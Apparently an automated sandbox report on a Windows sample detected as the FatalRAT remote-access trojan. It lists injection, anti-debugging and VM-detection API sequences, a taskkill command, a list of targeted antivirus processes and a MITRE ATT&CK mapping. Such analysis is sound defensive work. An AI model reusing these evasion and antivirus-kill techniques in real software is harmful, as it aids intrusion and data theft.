Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_00421296 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,	0_2_00421296
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_00414D65 lstrlenA,FindFirstFileA,FindClose,	0_2_00414D65
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_00421296 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,	1_2_00421296
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_00402490 FindFirstFileA,FindClose,	1_2_00402490
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_004165BB FindFirstFileA,GetLastError,lstrlenA,SetLastError,__fullpath,__splitpath_s,__makepath_s,	1_2_004165BB
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_00414D65 lstrlenA,FindFirstFileA,FindClose,	1_2_00414D65
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_100060EF __EH_prolog,#535,#539,#5710,#800,#800,#539,#939,#800,#539,#939,#800,FindFirstFileA,FindClose,#800,	1_2_100060EF
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_100022CE __EH_prolog,malloc,GetEnvironmentVariableA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,FindNextFileA,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,	1_2_100022CE
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_10005B32 __EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?at@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_strcmpi,_strcmpi,_strcmpi,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileA,FindClose,RemoveDirectoryA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,	1_2_10005B32
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_100060EF __EH_prolog,#535,#539,#5710,#800,#800,#539,#939,#800,#539,#939,#800,FindFirstFileA,FindClose,#800,	3_2_100060EF
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_100022CE __EH_prolog,malloc,GetEnvironmentVariableA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,FindNextFileA,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,	3_2_100022CE
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_10005B32 __EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?at@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_strcmpi,_strcmpi,_strcmpi,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileA,FindClose,RemoveDirectoryA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,	3_2_10005B32

Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe

Code function: 0_2_00426553 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,

0_2_00426553

Source: svchost.exe, 00000002.00000002.210471954.000001A561740000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.272621527.0000026D32540000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.293476440.00000275E8140000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.465708325.00000208FB540000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: Vwxyab.exe, 00000003.00000003.199399316.00000000022B0000.00000004.00000001.sdmp	Binary or memory string: XXAcQbcXXfRSScRKernel32.dllCreateToolhelp32SnapshotKernel32.dllCreateToolhelp32SnapshotHARDWARE\DESCRIPTION\System\BIOS\SystemManufacturerVMWAREtaskkill /f /im rundll32.exeDisableLockWorkstationSoftware\Microsoft\Windows\CurrentVersion\Policies\SystemSVP7-Thread running...
Source: svchost.exe, 00000007.00000002.466642341.00000200B1061000.00000004.00000001.sdmp	Binary or memory string: @Hyper-V RAW
Source: svchost.exe, 00000007.00000002.466607419.00000200B104C000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000009.00000002.463739834.0000023A6FA02000.00000004.00000001.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: Vwxyab.exe	Binary or memory string: VMWARE
Source: svchost.exe, 00000007.00000002.463926761.00000200AB829000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW@Q
Source: svchost.exe, 00000002.00000002.210471954.000001A561740000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.272621527.0000026D32540000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.293476440.00000275E8140000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.465708325.00000208FB540000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: Vwxyab.exe, 00000003.00000003.199399316.00000000022B0000.00000004.00000001.sdmp	Binary or memory string: .PADbad bufferbad AllocateROOT\WMISELECT * FROM MSAcpi_ThermalZoneTemperatureWQLCurrentTemperature\\.\PhysicalDrive0VMware ToolsVMware
Source: svchost.exe, 00000002.00000002.210471954.000001A561740000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.272621527.0000026D32540000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.293476440.00000275E8140000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.465708325.00000208FB540000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: Vwxyab.exe, 00000003.00000003.199399316.00000000022B0000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: Vwxyab.exe	Binary or memory string: VMware Tools
Source: svchost.exe, 00000009.00000002.463927215.0000023A6FA40000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.463955404.00000208FA83E000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.464628827.000001E6EEA2A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000002.00000002.210471954.000001A561740000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.272621527.0000026D32540000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.293476440.00000275E8140000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.465708325.00000208FB540000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: Vwxyab.exe, 00000003.00000002.464604070.000000000084E000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD

Source: C:\Windows\Vwxyab.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Vwxyab.exe

Code function: 1_2_10002380 rdtsc

1_2_10002380

Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe

Code function: 0_2_0042569C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0042569C

Source: C:\Windows\Vwxyab.exe

Code function: 1_2_10002550 VirtualProtect 00000000,?,00000120,?,?,?,?,?,?,?,?,00000000,10015A2A,1001B420,000000FF

1_2_10002550

Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe

Code function: 0_2_00403140 LoadLibraryA,GetProcAddress,VirtualFree,LoadLibraryA,GetProcAddress,VirtualProtect,

0_2_00403140

Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe

Code function: 0_2_00426C29 GetStartupInfoA,GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,__amsg_exit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__amsg_exit,__setenvp,__amsg_exit,__cinit,__amsg_exit,__wincmdln,

0_2_00426C29

Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Vwxyab.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Vwxyab.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_004320FA SetUnhandledExceptionFilter,__encode_pointer,	0_2_004320FA
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_0043211C __decode_pointer,SetUnhandledExceptionFilter,	0_2_0043211C
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_0042569C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0042569C
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_00431D4F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00431D4F
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_00425F75 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00425F75
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_004320FA SetUnhandledExceptionFilter,__encode_pointer,	1_2_004320FA
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_0043211C __decode_pointer,SetUnhandledExceptionFilter,	1_2_0043211C
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_0042569C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_0042569C
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_00431D4F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00431D4F
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_00425F75 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00425F75
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_1000B281 __EH_prolog,wsprintfA,CreateMutexA,GetLastError,ReleaseMutex,CloseHandle,ExitProcess,SetUnhandledExceptionFilter,GetCurrentThread,SetThreadPriority,Sleep,lstrcatA,strcmp,GetTickCount,GetTickCount,WaitForSingleObject,Sleep,	1_2_1000B281
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_1000B281 __EH_prolog,wsprintfA,CreateMutexA,GetLastError,ReleaseMutex,CloseHandle,ExitProcess,SetUnhandledExceptionFilter,GetCurrentThread,SetThreadPriority,Sleep,lstrcatA,strcmp,GetTickCount,GetTickCount,WaitForSingleObject,Sleep,	3_2_1000B281

Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe

Memory protected: page execute read | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to automate explorer (e.g. start an application)

Show sources

Source: C:\Windows\Vwxyab.exe	Code function: 1_2_100078C6 FindWindowA,FindWindowA,ShowWindow,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,ShowWindow,FindWindowA,SendMessageA,mciSendStringA,Beep,Sleep,GetForegroundWindow,MoveWindow,GetWindowRect,MoveWindow,Sleep,MoveWindow,Sleep,Beep,SwapMouseButton,	1_2_100078C6
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_100078C6 FindWindowA,FindWindowA,ShowWindow,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,ShowWindow,FindWindowA,SendMessageA,mciSendStringA,Beep,Sleep,GetForegroundWindow,MoveWindow,GetWindowRect,MoveWindow,Sleep,MoveWindow,Sleep,Beep,SwapMouseButton,	1_2_100078C6
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_100078C6 FindWindowA,FindWindowA,ShowWindow,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,ShowWindow,FindWindowA,SendMessageA,mciSendStringA,Beep,Sleep,GetForegroundWindow,MoveWindow,GetWindowRect,MoveWindow,Sleep,MoveWindow,Sleep,Beep,SwapMouseButton,	3_2_100078C6
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_100078C6 FindWindowA,FindWindowA,ShowWindow,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,FindWindowA,FindWindowA,ShowWindow,ShowWindow,FindWindowA,ShowWindow,FindWindowA,SendMessageA,mciSendStringA,Beep,Sleep,GetForegroundWindow,MoveWindow,GetWindowRect,MoveWindow,Sleep,MoveWindow,Sleep,Beep,SwapMouseButton,	3_2_100078C6

Contains functionality to inject threads in other processes

Show sources

Source: C:\Windows\Vwxyab.exe	Code function: 1_2_100036A3 OpenProcess,memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,		1_2_100036A3
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_100036A3 OpenProcess,memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,		3_2_100036A3

Source: C:\Windows\Vwxyab.exe	Code function: LoadLibraryA,GetProcAddress,Process32First,_strcmpi,Process32Next, explorer.exe	1_2_10002706
Source: C:\Windows\Vwxyab.exe	Code function: LoadLibraryA,GetProcAddress,Process32First,_strcmpi,Process32Next, explorer.exe	1_2_10002706
Source: C:\Windows\Vwxyab.exe	Code function: CreateToolhelp32Snapshot,Process32First,_strcmpi,OpenProcess,TerminateProcess,Process32Next,CloseHandle, explorer.exe	1_2_100059ED
Source: C:\Windows\Vwxyab.exe	Code function: CreateToolhelp32Snapshot,Process32First,_strcmpi,OpenProcess,TerminateProcess,Process32Next,CloseHandle, explorer.exe	3_2_100059ED
Source: C:\Windows\Vwxyab.exe	Code function: LoadLibraryA,GetProcAddress,Process32First,_strcmpi,Process32Next, explorer.exe	3_2_10002706
Source: C:\Windows\Vwxyab.exe	Code function: LoadLibraryA,GetProcAddress,Process32First,_strcmpi,Process32Next, explorer.exe	3_2_10002706

Source: Vwxyab.exe, 00000003.00000002.464681073.0000000000EA0000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.464393472.000002A9D4990000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: Vwxyab.exe, svchost.exe, 0000000B.00000002.464393472.000002A9D4990000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: Vwxyab.exe, svchost.exe, 0000000B.00000002.464393472.000002A9D4990000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: Vwxyab.exe, 00000003.00000002.464681073.0000000000EA0000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.464393472.000002A9D4990000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: Vwxyab.exe, 00000003.00000003.199399316.00000000022B0000.00000004.00000001.sdmp	Binary or memory string: "\\.\PHYSICALDRIVE0SeShutdownPrivilegeProgmanProgmanShell_TrayWnd
Source: Vwxyab.exe, 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp, Vwxyab.exe, 00000003.00000003.199399316.00000000022B0000.00000004.00000001.sdmp	Binary or memory string: ButtonShell_TrayWnd

Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe

Code function: 0_2_00434D87 cpuid

0_2_00434D87

Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: GetThreadLocale,GetLocaleInfoA,GetACP,	0_2_004392ED
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: GetLocaleInfoA,	0_2_00434744
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,	0_2_0040AA97
Source: C:\Windows\Vwxyab.exe	Code function: GetThreadLocale,GetLocaleInfoA,GetACP,	1_2_004392ED
Source: C:\Windows\Vwxyab.exe	Code function: GetLocaleInfoA,	1_2_00434744
Source: C:\Windows\Vwxyab.exe	Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,	1_2_0040AA97

Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe

Code function: 0_2_0042FC9B GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_0042FC9B

Source: C:\Windows\Vwxyab.exe

Code function: 1_2_1000AED0 wsprintfA,memset,lstrlenA,memset,getsockname,GetVersionExA,GlobalMemoryStatusEx,CoInitialize,CoCreateInstance,GetLastInputInfo,GetTickCount,strcpy,lstrcpyA,lstrcpyA,lstrcpyA,strcpy,strcpy,GetUserNameA,printf,strcpy,

1_2_1000AED0

Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe

Code function: 0_2_0042B285 __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,

0_2_0042B285

Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe

0_2_00426C29

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)

Show sources

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Source: Vwxyab.exe	Binary or memory string: kxetray.exe
Source: Vwxyab.exe	Binary or memory string: avcenter.exe
Source: Vwxyab.exe	Binary or memory string: vsserv.exe
Source: Vwxyab.exe	Binary or memory string: cfp.exe
Source: Vwxyab.exe	Binary or memory string: avp.exe
Source: Vwxyab.exe	Binary or memory string: almon.exe
Source: Vwxyab.exe	Binary or memory string: F-PROT.exe
Source: svchost.exe, 0000000F.00000002.464551229.000002282903D000.00000004.00000001.sdmp	Binary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Vwxyab.exe	Binary or memory string: spidernt.exe
Source: Vwxyab.exe	Binary or memory string: Nsvmon.npc
Source: Vwxyab.exe	Binary or memory string: 360tray.exe
Source: Vwxyab.exe	Binary or memory string: ashDisp.exe
Source: Vwxyab.exe	Binary or memory string: TMBMSRV.exe
Source: Vwxyab.exe	Binary or memory string: avgui.exe
Source: svchost.exe, 0000000F.00000002.464604684.0000022829102000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Vwxyab.exe	Binary or memory string: arcavir.exe
Source: Vwxyab.exe	Binary or memory string: RavMonD.exe
Source: Vwxyab.exe	Binary or memory string: QUHLPSVC.EXE
Source: Vwxyab.exe	Binary or memory string: Mcshield.exe
Source: Vwxyab.exe	Binary or memory string: guardxservice.exe

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Stealing of Sensitive Information:

Yara detected FatalRAT

Show sources

Source: Yara match	File source: Process Memory Space: Vwxyab.exe PID: 1488, type: MEMORY
Source: Yara match	File source: Process Memory Space: Vwxyab.exe PID: 5028, type: MEMORY

Remote Access Functionality:

Yara detected FatalRAT

Show sources

Source: Yara match	File source: Process Memory Space: Vwxyab.exe PID: 1488, type: MEMORY
Source: Yara match	File source: Process Memory Space: Vwxyab.exe PID: 5028, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Windows Management Instrumentation1	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools111	Input Capture121	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Native API1	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Input Capture121	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter2	Valid Accounts1	Valid Accounts1	Obfuscated Files or Information2	Security Account Manager	System Service Discovery1	SMB/Windows Admin Shares	Clipboard Data2	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Service Execution12	Windows Service23	Access Token Manipulation11	Software Packing1	NTDS	System Network Connections Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Registry Run Keys / Startup Folder1	Windows Service23	DLL Side-Loading1	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Bootkit2	Process Injection113	Masquerading121	Cached Domain Credentials	System Information Discovery44	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Registry Run Keys / Startup Folder1	Valid Accounts1	DCSync	Security Software Discovery161	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion26	Proc Filesystem	Virtualization/Sandbox Evasion26	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Access Token Manipulation11	/etc/passwd and /etc/shadow	Process Discovery13	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Process Injection113	Network Sniffing	Application Window Discovery11	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Bootkit2	Input Capture	System Owner/User Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
